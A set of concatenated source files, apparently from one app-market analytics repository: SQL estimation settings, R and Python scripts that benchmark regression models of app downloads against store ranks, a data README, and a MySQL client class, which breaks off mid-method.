SET @current_db = DATABASE();
SET @current_user = SUBSTRING(USER(),1,LOCATE('@',USER())-1);
-- Exclude apps from estimation --
SET @exclude_application_ids = '';
-- Exclude known preinstalls
SET @exclude_preinstalled_application_ids =
CONCAT('113,6778,6979,7539,15238,18545,20084,25406,35636,58443,62720,',
'79188,88977,127606,166697,183731,197336,199731,234834,248557,421144,',
'527508,550323,625134,665595,932882,938035,1168498,1188274,1219512,',
'1889271,2595933');
-- Countries --
SET @countries_free = 'NL,US';
SET @countries_paid = 'NL,US';
SET @countries_gross = 'NL,US';
-- Day weigths --
-- In this variable you can set the days to calculate the weighted average
-- of the downloads/revenues that are taken into account in the ranking
-- algorithm. The first element is the weight for the day before @date.
-- Note that the max. number of day weights is 10
SET @day_weights = '0,1,1,1,1,1,1,1,1';
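-- Example: with @date = 20140604, the first weight (0) applies to 2014-06-03
-- and the remaining weights presumably to successively earlier days, so the
-- eight days 2014-05-26..2014-06-02 each get weight 1 (an unweighted average).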
-- General regression parameters --
SET @regression_b2_max = 20;
SET @regression_b2_stepsize = 1;
-- Set table names ---
SET @application_data_market_table = CONCAT(@current_db,'.application_data_market');
SET @estimation_market_table = CONCAT(@current_db,'.new_estimation_market');
SET @best_estimations_market_table = CONCAT(@current_db,'.best_estimations_market');
SET @sync_estimates_dev_best_estimations=0;
SET @reset_tables_for_all_countries = 0;
-- By default only data for estimated countries is removed from the tables.
-- Country quality settings for reporting --
-- set the country quality; this is only used
-- for the data checks
SET @low_quality_countries = 'CZ,PL,BG,CL,CY,EG,EE,GH,GR,HU,IS,LV,LT,LU,MY,PT,RO,SK,SI,UA,CI,CM,IR,KE,NI,SN';
-- Best estimations lock time out --
-- set how long the algorithm waits for the best estimations lock before
-- erroring
SET @lock_best_estimations_table = IF(@current_db = 'estimates', 1, 0);
SET @best_estimations_lock_name = CONCAT(@current_db, '_market_best_estimations_lock');
SET @best_estimations_lock_time_out = 1800;<file_sep>/old_investigations/plot_dist.R
#!/usr/bin/env Rscript
library(ggplot2)
library(scales)
source("internal/plot_common.R")
r <- read_csv_and_metainfo_from_arg()
df = r$df
metainfo = r$metainfo
max_day = max(df$both_real_estimate_num, na.rm=TRUE)
# Select only when we have max days
sub_df= subset(df, (both_real_estimate_num == max_day))
df = sub_df
stacked_df = data.frame()
for (unit in c("Downloads", "USD")) {
current_df = subset(df, Unit==unit)
# The default winner is SDA.
current_df$winner = "SDA"
# Where SDA loses.
sel = (abs(current_df$estimate_avg - current_df$units_avg) > abs(current_df$Current.Best.Estimation - current_df$units_avg))
current_df$winner[sel] = 'Current.Best.Estimation'
## This has to be put last!
## Use this if you want to separate '< 5% difference' out
## sel = abs(((abs(current_df$estimate_avg - current_df$units_avg) / current_df$units_avg) - (abs(current_df$Current.Best.Estimation - current_df$units_avg) / current_df$units_avg))) < 0.05
## current_df$winner[sel] = '< 5% difference'
## Compress outliers.
m = mean(current_df$units_avg)
s = sd(current_df$units_avg)
current_df$units_avg[current_df$units_avg > (m + 2 * s)] = m + 2 * s
stacked_df = rbind(stacked_df, current_df)
}
plot <- plot_dist(stacked_df, metainfo)
ggsave(plot, file=paste('plots/', paste(metainfo$country, metainfo$period, 'dist.png', sep='_'), sep=''), width=10, height=5)
<file_sep>/review-sentiment-analysis/lib/constants.py
__author__ = 'hgriffioen'
DATA_DIR = r'/home/vagrant/data/demie'
#DATA_DIR = '/Users/rafael/appannie/data/demie'
#reviews_file = 'reviews_143441_2014-01--2014-06.csv'
reviews_file = 'sampled_reviews_143441_2014-01--2014-06.csv'
SOME_FIXED_SEED = 42
DELIMITER = ' '
JOBS = 6
PARALLEL_CHUNK_SIZE = 50000
MIN_N = 2
MAX_N = 2
<file_sep>/aa_au_model/heavy_usage/README.MD
# Heavy user investigation
Investigate users who use up a disproportionate amount of bandwidth.
## Notebooks:
<li> <code>Heavy user characterization</code>: generate plots for presentation "DEV - AARDVARK - Whale Users Analysis" </li>
<li> <code>MDM bandwidth distributions</code>: investigate MDM distributions </li>
<li> <code>Impact Scenarios</code>: assess impact of three scenarios (see "DS - Aardvark - VPN heavy users blocking") </li>
## Data
Data structures are a bit of a mess because of the ad-hoc work. In general, if a data structure ends with <code>$month$\_01</code> it is monthly data (e.g. <code>2015\_04\_01</code>), <code>$month$\_XX</code> with <code>XX != 01</code> is weekly data (e.g. <code>2015\_04\_45</code>). For months the begin date is used, for weeks the end date. Sometimes underscores are used, sometimes not. Yes. Align begin and end dates of files yourself.
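A minimal sketch (purely illustrative, not part of this repo) of the suffix rule above; it assumes the name actually ends in a two-digit day/week token and will not handle month-only names such as <code>vpn\_ios\_bandwidth\_usage\_2015\_04.tsv</code>:

```python
def period_type(filename):
    """'monthly' if the name ends in <month>01, else 'weekly' (sketch only)."""
    stem = filename.rsplit('.', 1)[0].replace('_', '')
    return 'monthly' if stem[-2:] == '01' else 'weekly'

print(period_type('mobidia_bandwidth_usage_20150401.csv'))  # monthly
print(period_type('sample_usage_2015_04_45.tsv'))           # weekly
```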
### MDM data
All MDM data was queried from Redshift using the Notebook ../Mobidia export.ipynb locally.
<li> <code>mobidia\_bandwidth\_usage\_2015$month$$day$.csv</code>: Monthly/weekly bandwidth, see <code>sql/get\_mdm\_bandwidth.sql</code> </li>
<li> <code>mdm\_monthly\_2015$month$$day$.csv</code>: Monthly/weekly usage, see <code>get\_mdm\_usage.sql</code> </li>
### VPN data
All VPN data was queried on Hive.
<li><code>vpn\_ios\_bandwidth\_usage\_2015\_04.tsv</code>: Monthly bandwidth usage from April and later, see <code>sql/get\_monthly\_device\_bandwidth.sql</code> </li>
<li><code>sample\_usage\_2015\_$month$\_$day$.tsv</code>: Monthly/weekly usage for sample users, see <code>sql/get\_sample\_user\_stats.sql</code> tables <code>monthly\_device\_usage</code> and <code>weekly\_device\_usage</code> </li>
<li><code>sample\_users\_bandwidth\_2015\_$month$\_$day$.tsv</code>: Monthly/weekly bandwidth for sample users, see <code>sql/get\_sample\_user\_stats.sql</code> tables <code>period\_users</code> and <code>period\_users\_week</code> </li>
<file_sep>/sbe_benchmark/model_pv8.py
##
# KPI_analysis_ios_nonnuniv version 3
# Department: Data Science
# Author: <NAME>
# Create: Sept 26, 2013
# Description: Simulate the SBE solution on the data set Debug
# Also include the SBE error comparison with Auto_segmted SBE
##
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import pandas as pd
import os
#import config
#import operator
#import math
import csv
#import statsmodels.formula.api as sm
import statsmodels.regression.linear_model as sm
#from sklearn.svm import SVR
import numpy as np
#from rpy import *
import datetime as dt
from sklearn.cross_validation import KFold
# from numpy import NA as NA
import bz2
result = None
gres = []
feed_market_format = { 0: 'Free',
1: 'Paid',
2: 'Grossing',
}
def fun(x):
if np.isnan(x):
return 0
else:
return 1/pow(float(x),2 )
def wavg(group):
d = group['t1e']
w = group['nb_obs']
return (d * w).sum() / w.sum()
def preprocess_metadata(df):
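    # Feature engineering for the rank regressions: combine iPhone+iPad daily
    # estimates, add log and inverse rank transforms, and one-hot weekday dummies.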
df['iphone_estimate'] = df['iphone_estimate'].fillna(0)
df['ipad_estimate'] = df['ipad_estimate'].fillna(0)
df['actual_log']=np.log(df['actual'])
df['Daily.Estimate']=df['iphone_estimate'] + df['ipad_estimate']
df['r1_log']=np.log(df['iphone_rank']+1.0)
df['r2_log']=np.log(df['ipad_rank']+1.0)
df['r1_inv']=1.0/df['iphone_rank']
df['r2_inv']=1.0/df['ipad_rank']
df['weekday'] = df['date'].apply(lambda x: dt.datetime.strptime(x, '%Y-%m-%d').weekday())
df['isMon'] = 0
df['isTue'] = 0
df['isWed'] = 0
df['isThu'] = 0
df['isFri'] = 0
df['isSat'] = 0
df['isSun'] = 0
df['isMon'][(df['weekday'] == 0)] = 1
df['isTue'][(df['weekday'] == 1)] = 1
df['isWed'][(df['weekday'] == 2)] = 1
df['isThu'][(df['weekday'] == 3)] = 1
df['isFri'][(df['weekday'] == 4)] = 1
df['isSat'][(df['weekday'] == 5)] = 1
df['isSun'][(df['weekday'] == 6)] = 1
#df['wt_rank_iphone'] = 1.0/df['iphone_rank']**2
#df['wt_rank_ipad'] = 1.0/df['ipad_rank'] ** 2
#df['wt_rank_iphone'] = df['wt_rank_iphone'].fillna(0)
#df['wt_rank_ipad'] = df['wt_rank_ipad'].fillna(0)
#df['wt_rank'] = df['wt_rank_iphone'] + df['wt_rank_ipad']
#df['wt_perc'] = 1.0 / df['actual']
#del df['wt_rank_iphone']
#del df['wt_rank_ipad']
df = df.drop_duplicates()
return df
def regression(df, fdate, ldate):
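    # For every (category_id, feed_id) group and each date in [fdate, ldate]:
    # fit OLS of log(actuals) on log/inverse ranks plus weekday dummies over a
    # trailing 7-day window, cross-validated with a 5-fold split on app_id.
    # Separate models are fitted for iPhone-only, iPad-only and universal apps,
    # falling back to the fit on all data whenever a fold's model fails.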
startdate = fdate
enddate = ldate
gres = []
for n, g in df.groupby(['category_id', 'feed_id']):
dates = g['date'].drop_duplicates()
for date in dates:
if (date > enddate) or (date < startdate):
continue
print n, date
df_obs = g[(g['date'] <= date) & (g['date'] >= (dt.datetime.strptime(date, '%Y-%m-%d').date() - dt.timedelta(days=7)).isoformat() )]
df_obs = df_obs.reset_index()
app_ids = df_obs[['app_id']].drop_duplicates().reset_index()
del app_ids['index']
kf = KFold(len(app_ids), n_folds=5, indices=True, shuffle=True)
#kf = KFold(len(df_obs), n_folds=5, indices=True, shuffle=True)
#print('iphone_only')
test_out1 = []
try:
model_ra1 = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=df_obs, subset = ((np.isnan(df_obs['r1_log']) == False) & (np.isnan(df_obs['r2_log']) == True) & (np.isnan(df_obs['actual_log']) == False) & (np.isnan(df_obs['has_event_flag']) == True)))
fitted_ra1 = model_ra1.fit()
for tr, te in kf:
train = df_obs[df_obs['app_id'].isin(app_ids.loc[tr]['app_id'])]
test = df_obs[df_obs['app_id'].isin(app_ids.loc[te]['app_id'])]
#train = df_obs.loc[tr]
#test = df_obs.loc[te]
test1 = test.dropna(subset = ['r1_log'])
test1 = test1[test1['date'] == date]
try:
                        model_r1 = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=train, subset = ((np.isnan(train['r1_log']) == False) & (np.isnan(train['r2_log']) == True) & (np.isnan(train['actual_log']) == False) & (np.isnan(train['has_event_flag']) == True)))
fitted_r1 = model_r1.fit()
test1['t1e'] = list(np.exp(fitted_r1.predict(test1[['r1_log', 'r1_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']])))
except:
test1['t1e'] = list(np.exp(fitted_ra1.predict(test1[['r1_log', 'r1_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']])))
test_out1.append(test1)
test_out1 = pd.concat(test_out1)
except:
test_out1 = df_obs[df_obs['date'] == date]
test_out1['t1e'] = np.nan
test_out1['t1e'] = test_out1['t1e'].astype(float)
pass
#print('ipad_only')
test_out2 = []
try:
model_ra2 = sm.OLS.from_formula(formula ='actual_log ~ r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=df_obs, subset = ((np.isnan(df_obs['r1_log']) == True) & (np.isnan(df_obs['r2_log']) == False) & (np.isnan(df_obs['actual_log']) == False) & (np.isnan(df_obs['has_event_flag']) == True)))
fitted_ra2 = model_ra2.fit()
for tr, te in kf:
train = df_obs[df_obs['app_id'].isin(app_ids.loc[tr]['app_id'])]
test = df_obs[df_obs['app_id'].isin(app_ids.loc[te]['app_id'])]
#train = df_obs.loc[tr]
#test = df_obs.loc[te]
test2 = test.dropna(subset = ['r2_log'])
test2 = test2[test2['date'] == date]
try:
                        model_r2 = sm.OLS.from_formula(formula ='actual_log ~ r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=train, subset = ((np.isnan(train['r1_log']) == True) & (np.isnan(train['r2_log']) == False) & (np.isnan(train['actual_log']) == False) & (np.isnan(train['has_event_flag']) == True)))
fitted_r2 = model_r2.fit()
test2['t2e'] = np.exp(fitted_r2.predict(test2[['r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
except:
test2['t2e'] = np.exp(fitted_ra2.predict(test2[['r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
test_out2.append(test2)
test_out2 = pd.concat(test_out2)
except:
test_out2 = df_obs[df_obs['date'] == date]
test_out2['t2e'] = np.nan
test_out2['t2e'] = test_out2['t2e'].astype(float)
pass
#print('universal')
test_outa = []
try:
model_raa = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=df_obs, subset = ((np.isnan(df_obs['r1_log']) == False) & (np.isnan(df_obs['r2_log']) == False) & (np.isnan(df_obs['actual_log']) == False) & (np.isnan(df_obs['has_event_flag']) == True)))
fitted_raa = model_raa.fit()
for tr, te in kf:
train = df_obs[df_obs['app_id'].isin(app_ids.loc[tr]['app_id'])]
test = df_obs[df_obs['app_id'].isin(app_ids.loc[te]['app_id'])]
#train = df_obs.loc[tr]
#test = df_obs.loc[te]
testa = test.dropna(subset = ['r2_log', 'r1_log'])
testa = testa[testa['date'] == date]
try:
                        model_ra = sm.OLS.from_formula(formula ='actual_log ~ r1_log + r1_inv + r2_log + r2_inv + isMon + isTue + isWed + isThu + isFri + isSat + isSun', data=train, subset = ((np.isnan(train['r1_log']) == False) & (np.isnan(train['r2_log']) == False) & (np.isnan(train['actual_log']) == False) & (np.isnan(train['has_event_flag']) == True)))
fitted_ra = model_ra.fit()
testa['tae'] = np.exp(fitted_ra.predict(testa[['r1_log', 'r1_inv', 'r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
except:
testa['tae'] = np.exp(fitted_raa.predict(testa[['r1_log', 'r1_inv', 'r2_log', 'r2_inv', 'isMon', 'isTue', 'isWed', 'isThu', 'isFri', 'isSat', 'isSun']]))
test_outa.append(testa)
test_outa = pd.concat(test_outa)
test_outa = test_outa[test_outa['date'] == date]
except:
test_outa = df_obs[df_obs['date'] == date]
test_outa['tae'] = np.nan
test_outa['tae'] = test_outa['tae'].astype(float)
pass
#print test_out1.columns
test_out1 = test_out1[['app_id', 'category_id', 'date', 'feed_id', 't1e']]
test_out2 = test_out2[['app_id', 'category_id', 'date', 'feed_id', 't2e']]
test_outa = test_outa[['app_id', 'category_id', 'date', 'feed_id', 'tae']]
result = df_obs[df_obs['date'] == date]
result['nb_obs'] = df_obs['actual'].dropna().shape[0]
result = result.merge(test_out1, on=['app_id', 'category_id', 'date', 'feed_id'], how='outer')
result = result.merge(test_out2, on=['app_id', 'category_id', 'date', 'feed_id'], how='outer')
result = result.merge(test_outa, on=['app_id', 'category_id', 'date', 'feed_id'], how='outer')
gres.append(result)
if (gres == []):
return pd.DataFrame()
gres = pd.concat(gres)
gres['tae'] = gres['tae'].where(np.isnan(gres['tae']) == False, gres['t1e'])
gres['tae'] = gres['tae'].where(np.isnan(gres['tae']) == False, gres['t2e'])
#print gres.dtypes()
gres.to_csv('res_stg_%s_v8.csv'%store_id, index=False, quoting = csv.QUOTE_NONNUMERIC)
return gres
def gene_final(df):
gres_final = df.groupby(['store_id', 'date', 'app_id', 'feed_id']).mean().reset_index()
gres_final['sbe_rel_error'] = (gres_final['iphone_estimate'] + gres_final['ipad_estimate'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['tae_rel_error'] = (gres_final['tae'] - gres_final['actual']).abs()*1.0/gres_final['actual']
#gres_final['t12e_rel_error'] = (gres_final['t1e+t2e'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final.to_csv('res_%s_v8.csv'%store_id,index=False, quoting = csv.QUOTE_NONNUMERIC)
return gres_final
def gene_final_byscore(df):
#actuals_df = df[['store_id', 'date', 'feed_id', 'app_id', 'actual']].drop_duplicates()
gres_final = df.groupby(['store_id', 'date', 'app_id', 'feed_id']).mean().reset_index()
df['loginv_abs_error'] = (df['tae'] - df['actual']).abs()
df['loginv_rel_error'] = df['loginv_abs_error'] / df['actual']
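    # Score each (category, device) estimate as 1 / (rank * relative_error + 1):
    # accurate estimates at good (low) ranks score close to 1; universal apps
    # average the iPhone and iPad scores. The scores are then used as weights to
    # average the per-category estimates into one scored estimate per app.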
df['score'] = 0.0
df['score'][np.isnan(df['iphone_rank'])==False] = 1.0 / ((df['iphone_rank'] * df['loginv_rel_error']) + 1.0)
df['score'][np.isnan(df['ipad_rank'])==False] = 1.0 / ((df['ipad_rank'] * df['loginv_rel_error']) + 1.0)
df['score'][(np.isnan(df['iphone_rank'])==False) &
(np.isnan(df['ipad_rank'])==False)] = ((1.0 / ((df['iphone_rank'] * df['loginv_rel_error']) + 1.0)) + (1.0 / ((df['ipad_rank'] * df['loginv_rel_error']) + 1.0)))/2.0
#scores = df.groupby(['store_id', 'feed_id', 'category_id']).sum().reset_index()
#scores = scores[['store_id', 'feed_id', 'category_id', 'score']]
#del df['score']
#loginv_sbe_df = df.groupby(['store_id', 'date', 'feed_id', 'app_id']).mean().reset_index()
#loginv_sbe_df.rename(columns={'loginv_estimate':'loginv_sbe_estimate'}, inplace=True)
#del loginv_sbe_df['actual']
#loginv_sbe_df = loginv_sbe_df.merge(actuals_df, on=['store_id', 'date', 'feed_id', 'app_id'])
#loginv_sbe_df['loginv_sbe_abs_error'] = (loginv_sbe_df['loginv_sbe_estimate'] - loginv_sbe_df['actual']).abs()
#loginv_sbe_df['loginv_sbe_rel_error'] = loginv_sbe_df['loginv_sbe_abs_error'] / loginv_sbe_df['actual']
#df = df[df['date']==df['date'].min()]
#loginv_scored_sbe_df = df.drop_duplicates(cols=['store_id', 'date', 'category_id', 'feed_id', 'app_id'])
#loginv_scored_sbe_df = loginv_scored_sbe_df.merge(scores, on=['store_id', 'feed_id', 'category_id'])
df['tae_scored'] = df['tae'] * df['score']
loginv_scored_sbe_df = df.groupby(['store_id', 'date', 'feed_id', 'app_id']).sum().reset_index()
loginv_scored_sbe_df['tae_scored'] /= loginv_scored_sbe_df['score']
loginv_scored_sbe_df.drop_duplicates(cols=['store_id', 'date', 'feed_id', 'app_id'], inplace=True)
#loginv_scored_sbe_df.rename(columns={'loginv_scored_estimate':'loginv_scored_sbe_estimate'}, inplace=True)
#del loginv_scored_sbe_df['actual']
#loginv_scored_sbe_df = loginv_scored_sbe_df.merge(actuals_df, on=['store_id', 'date', 'feed_id', 'app_id'])
#loginv_scored_sbe_df['loginv_scored_sbe_abs_error'] = (loginv_scored_sbe_df['loginv_scored_sbe_estimate'] - loginv_scored_sbe_df['actual']).abs()
#loginv_scored_sbe_df['loginv_scored_sbe_rel_error'] = loginv_scored_sbe_df['loginv_scored_sbe_abs_error'] / loginv_scored_sbe_df['actual']
loginv_scored_sbe_df = loginv_scored_sbe_df[['store_id', 'date', 'feed_id', 'app_id', 'tae_scored', 'score']]
gres_final = pd.merge(gres_final, loginv_scored_sbe_df, on=['store_id', 'date', 'feed_id', 'app_id'])
gres_final['sbe_rel_error'] = (gres_final['iphone_estimate'] + gres_final['ipad_estimate'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['tae_rel_error'] = (gres_final['tae'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final['tae_scored_rel_error'] = (gres_final['tae_scored'] - gres_final['actual']).abs()*1.0/gres_final['actual']
gres_final.drop_duplicates(cols=['store_id', 'date', 'feed_id', 'app_id'], inplace=True)
gres_final.to_csv('res_%s_v8.csv'%store_id,index=False, quoting = csv.QUOTE_NONNUMERIC)
return gres_final
def plot_rank_error(df):
df = df.merge(df, on=['Store', 'Day', 'App.ID'], how='left')
df = df[df['Category_x'] ==36]
#gres_iphone = gres[(gres['Rank_x_x'] > 0) & (gres['sbe_rel_error'] < 5) & (gres['new_rel_error'] < 5)]
    gres_iphone = df[(df['Rank_x_x'] > 0) & (df['sbe_rel_error'] < 5) & (df['t12e_rel_error'] < 5)]
gres_iphone = gres_iphone.sort('Rank_x_x', ascending=True)
for n, g in gres_iphone.groupby(['Day']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(g['Rank_x_x'], g['sbe_rel_error'] * 100.0, c = 'r', label='SBE')
        ax.scatter(g['Rank_x_x'], g['t12e_rel_error'] * 100.0, c = 'g', label='Auto-Segmented SBE')
ax.legend(loc='best')
title = 'Relative Error iPhone Grossing Overall July%s'%str(int(float(n)))
plt.title(title)
plt.xlim(0, 1000)
plt.ylabel('Relative Error %')
plt.xlabel('Rank')
plt.grid()
fig.savefig('Relative Error Plots/%s.png'%title)
print title
plt.close()
    gres_ipad = df[(df['Rank_y_x'] > 0) & (df['sbe_rel_error'] < 5) & (df['t12e_rel_error'] < 5)]
gres_ipad = gres_ipad.sort('Rank_y_x', ascending=True)
for n, g in gres_ipad.groupby(['Day']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.scatter(g['Rank_y_x'], g['sbe_rel_error'] * 100.0, c = 'r', label='SBE')
        ax.scatter(g['Rank_y_x'], g['t12e_rel_error'] * 100.0, c = 'g', label='Auto-Segmented SBE')
ax.legend(loc='best')
title = 'Relative Error iPad Grossing Overall July%s'%str(int(float(n)))
plt.title(title)
plt.xlim(0, 400)
plt.ylabel('Relative Error %')
plt.xlabel('Rank')
plt.grid()
fig.savefig('Relative Error Plots/%s.png'%title)
print title
plt.close()
def plot_8020(df):
for n, g in df.groupby(['feed_id', 'date']):
date = str(n[1])
feed = int(float(n[0]))
fig = plt.figure()
g = g.sort('actual', ascending=False)
ax = fig.add_subplot(111)
g = g.sort('sbe_rel_error', ascending=True)
p0, = ax.plot(g['sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r-', label='SBE')
g = g.sort('tae_rel_error', ascending=True)
p2, = ax.plot(g['tae_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='LogInv')
g = g.sort('tae_scored_rel_error', ascending=True)
p1, = ax.plot(g['tae_scored_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', label='LogInv Scored')
ax.legend(loc=4)
if (feed == 0):
title = '80-20 %s %s Free All Apps'%(store_id, date)
if (feed == 1):
title = '80-20 %s %s Paid All Apps'%(store_id, date)
if (feed == 2):
title = '80-20 %s %s Grossing All Apps'%(store_id, date)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
print title
fig.savefig('LogInv2_Daily_Plots/%s.png'%title)
plt.close()
fig = plt.figure()
g = g.sort('actual', ascending=False)
g = g[:200]
ax = fig.add_subplot(111)
g = g.sort('sbe_rel_error', ascending=True)
p0, = ax.plot(g['sbe_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'r-', label='SBE')
g = g.sort('tae_rel_error', ascending=True)
p2, = ax.plot(g['tae_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'b-', label='LogInv')
g = g.sort('tae_scored_rel_error', ascending=True)
p1, = ax.plot(g['tae_scored_rel_error'], (np.arange(g.shape[0])*1.0/g.shape[0])*100.0, 'g-', label='LogInv Scored')
ax.legend(loc=4)
if (feed == 0):
title = '80-20 %s %s Free Top200 Apps'%(store_id, date)
if (feed == 1):
title = '80-20 %s %s Paid Top200 Apps'%(store_id, date)
if (feed == 2):
title = '80-20 %s %s Grossing Top200 Apps'%(store_id, date)
plt.title(title)
plt.xlim(0, 1.0)
plt.ylabel('% of Apps')
plt.xlabel('Relative Error')
plt.grid()
print title
fig.savefig('LogInv2_Daily_Plots/%s.png'%title)
plt.close()
def plot_act_err(df):
for n, g in df.groupby(['feed_id', 'date']):
fig = plt.figure()
ax = fig.add_subplot(111)
ax.plot(g['actual'], g['actual'], color='black', label='Actual')
ax.plot(g['actual'], (g['Daily.Estimate']), 'r.', alpha=0.4, label='SBE')
ax.plot(g['actual'], (g['tae']), 'b.', alpha=0.4, label='LogInv Univ')
ax.legend(loc='best')
title = 'ActEst %s %s %s'%(store_id, str(int(float(n[0]))), str(n[1]) )
plt.title(title)
plt.ylabel('Estimates')
plt.xlabel('Actual')
plt.grid()
ax.set_yscale('log')
ax.set_xscale('log')
#fig.savefig('%s.png'%title)
fig.savefig('LogInv2_Daily_Plots/%s.png'%title)
print title
#plt.close()
def main():
global df_obs
global df_final
global store_id
#data_dir = '/Users/antony/workspace/data/benchmark_daily'
data_dir = '/home/antony/data/benchmark'
start_date = '2013-07-21'
end_date = '2013-07-27'
filelist= []
store_ids = set()
for root, dirs, files in os.walk(data_dir):
for file in files:
#if file.endswith(".csv.bz2") and '143441' in file:
if file.endswith(".csv.bz2"):
filepath = os.path.join(root, file)
                filelist.append(filepath)
store_ids.add(file.split('_')[2])
#store_ids.clear()
#store_ids.add('143441')
for i in list(store_ids):
store_id = i
print '======== country',store_id
sdf = []
        # Iterate over the paths collected above instead of relying on the
        # leftover `files`/`root` variables from the os.walk() loop.
        for filepath in filelist:
            file = os.path.basename(filepath)
            if file.endswith(".csv.bz2") and i in file:
                print filepath
dfbz = bz2.BZ2File(filepath, 'r')
pdf = pd.read_csv(dfbz)
sdf.append(pdf)
sdf = pd.concat(sdf)
df_obs = preprocess_metadata(sdf)
del sdf
df_reg = regression(df_obs, start_date, end_date)
del df_obs
if(df_reg.shape[0]==0):
continue
#df_final = gene_final(df_reg)
df_final = gene_final_byscore(df_reg)
del df_reg
df_plot = df_final.dropna(subset = ['actual'])
del df_final
# the following code build the overall_rank-error curve
if False:
plot_rank_error(df_plot)
# the following code build the 80-20 curve
if False:
plot_8020(df_plot)
# the following code build the Actual-Error curve
if False:
plot_act_err(df_plot)
del df_plot
print '======== Done',store_id
pass
if __name__ == '__main__':
main()<file_sep>/tooling/DistimoClients/distimo_clients/example_settings.ini
[MYSQL]
host = mm3
user = joep
password = <PASSWORD>
port = 3306
db =
[MoneyMaker]
host = report1
user = user
password = <PASSWORD>
port = 22
# Fill in user name and password, delete this line and rename this file to settings.ini.
<file_sep>/aa_au_model/audience/audience/paths.py
import os
def model(modality, source_platform, target_platform, target_country, classes, out_folder='out/'):
"""
Return path to model.
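
    Example (hypothetical argument values):
        model('gender', 'ios', 'android', 'US', ['male', 'female'])
        --> 'out/gender_ios_android_us/model/gender_android_male_female.pickle'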
"""
sub_folder = '_'.join((modality, source_platform, target_platform, target_country.lower()))
file_name = '_'.join([modality, target_platform] + classes) + '.pickle'
model_path = os.path.join(out_folder, sub_folder, 'model', file_name)
return model_path<file_sep>/int-vs-m-benchmark/sql/android/1001i1-store_weekly_averages.sql
/*
Store the weekly averages in JSON format.
*/
-- Increase group concat to be able to concat the JSON strings
SET SESSION group_concat_max_len = 100000;
-- Prepare the rank data.
DROP TEMPORARY TABLE IF EXISTS temp.rank_data_temp;
CREATE TEMPORARY TABLE temp.rank_data_temp(
store_id INT not null,
category_id INT not null,
feed INT not null,
start_date DATE NOT NULL,
end_date DATE NOT NULL,
data LONGTEXT,
CONSTRAINT PRIMARY KEY (store_id,category_id,feed,start_date,end_date))
select
x.store_id,
x.appannie_category_id as category_id,
x.feed,
date_sub(@date, interval 6 day) as start_date,
@date as end_date,
CONCAT('{', GROUP_CONCAT(rank_value_string order by rank separator ','), '}') as data
from
(
SELECT
cnm.store_id,
cgm.appannie_category_id,
fdtm.feed,
CONCAT('"', wra.rank, '"', ':', wra.average) AS rank_value_string,
wra.rank
FROM
temp.weekly_rank_averages wra
JOIN aa_benchmarking_android.feed_device_type_mappings fdtm
USING (type)
JOIN aa_benchmarking_android.country_mappings cnm
USING (country_id)
JOIN aa_benchmarking_android.category_mappings cgm
ON wra.category_id = cgm.distimo_category_id
) x
group by
x.store_id,
x.appannie_category_id,
x.feed;
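
-- The resulting `data` values are JSON objects mapping each rank to its
-- weekly average, e.g. (illustrative values only): {"1":10543.2,"2":9871.0,...}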
-- Remove values already present for generated stores and days.
delete
r.*
from
aa_benchmarking_android.rank_data r
join temp.rank_data_temp t
using(store_id, start_date);
-- Insert new values.
insert into aa_benchmarking_android.rank_data
select
t.store_id,
t.category_id,
t.feed,
t.start_date,
t.end_date,
t.data
from
temp.rank_data_temp t;<file_sep>/tooling/DistimoClients/distimo_clients/mysqldb.py
import configparser
import inspect
import glob
import mysql.connector
import numpy as np
import os
import re
from natsort import natsort  # note: requires the naturalsort 1.0.3 package
from pandas import DataFrame
import types
class Client:
def __init__(self, host="", user="", password="", port="", db=""):
"""
Loads database settings and creates connection. File settings.ini or
clients/settings.ini is read if no parameters are given.
"""
        if host is None or host == "":
# Parse settings.ini or /clients/settings.ini.
config = configparser.ConfigParser()
config.read('settings.ini')
if "MYSQL" not in config.keys():
path_to_class = os.path.dirname(inspect.getfile(self.__class__))
settings_path = (path_to_class + os.sep + 'settings.ini')
config.read(settings_path)
try:
self.host = config['MYSQL']['host']
self.user = config['MYSQL']['user']
self.password = config['MYSQL']['password']
self.port = config['MYSQL']['port']
self.db = config['MYSQL']['db']
except KeyError:
print('Error loading settings.ini file(s).')
raise
else:
# Unpack arguments.
self.host = host
self.user = user
            self.password = password
self.port = port
self.db = db
self.cursor = None
self.connector = None
self.create_connection()
def __del__(self):
self.destroy_connection()
def __invoker(self, func):
return func()
def __cursor_execute_and_commit(self,sql_statement,multi=False):
"""
Cursor executes statement with commit if successful else rollback.
"""
result = None
try:
if multi:
result = self.cursor.execute(sql_statement, multi=multi)
self.connector.commit()
else:
self.cursor.execute(sql_statement)
if self.connector.unread_result:
result = self.cursor.fetchall()
self.connector.commit()
return result
